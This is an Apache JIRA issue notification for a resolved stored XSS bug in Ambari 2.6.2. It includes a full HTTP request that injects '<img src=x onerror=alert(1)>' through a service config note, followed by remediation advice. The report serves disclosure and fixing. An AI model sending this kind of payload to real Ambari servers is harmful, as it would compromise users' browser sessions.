[jira] [Resolved] (AMBARI-25287) Persistent Cross Site Scripting (XSS) in Ambari

Mon, 27 May 2019 03:45:23 -0700 


     [ 
https://issues.apache.org/jira/browse/AMBARI-25287?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmytro Grinenko resolved AMBARI-25287.
--------------------------------------
    Resolution: Fixed

> Persistent Cross Site Scripting (XSS) in Ambari
> -----------------------------------------------
>
>                 Key: AMBARI-25287
>                 URL: https://issues.apache.org/jira/browse/AMBARI-25287
>             Project: Ambari
>          Issue Type: Bug
>          Components: ambari-web
>    Affects Versions: 2.6.2
>            Reporter: Andrii Tkach
>            Assignee: Andrii Tkach
>            Priority: Critical
>              Labels: pull-request-available
>          Time Spent: 0.5h
>  Remaining Estimate: 0h
>
> Below is the HTTP Request and Response issued when a user submits a note 
> containing a JavaScript
> after modifying some configuration in "Tez" service.
> HTTP Request:
> PUT /api/v1/clusters/<env> HTTP/1.1
> Host: xyz601:8080
> Content-Length: 199
> Accept: application/json, text/javascript, /; q=0.01
> Origin: http://xyz601:8080
> X-Requested-With: XMLHttpRequest
> X-Requested-By: X-Requested-By
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
> (KHTML,
> like Gecko) Chrome/70.0.3538.102 Safari/537.36
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
> Referer: http://xyz:8080/
> Accept-Encoding: gzip, deflate
> Accept-Language: en-US,en;q=0.9
> Cookie: AMBARISESSIONID=vfiy4336mxwl1k5ehd6jrz43i
> Connection: close
> {"Clusters":{"desired_service_config_versions":
> {"service_config_version":4,"service_name":"TEZ","service_config_version_note":"Creat
>  ed from service config version V4\n<img src=x onerror=alert(1)>"}
> }}
> Remediation Recommendations
> Restrict all input passed to the application to valid, whitelisted content, 
> and ensure that all
> response/output sent by the server is HTML/URL/JavaScript encoded, depending 
> on the context in
> which the data is used by the application.
> The remediation should not attempt to blacklist content and remove, filter, 
> or sanitize it. There are
> too many types of encoding it to get around filters for such content.
> We strongly recommend a positive security policy that specifies what is 
> allowed.
> Negative or attack signature based policies are difficult to maintain and are 
> likely to be incomplete.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

Reply via email to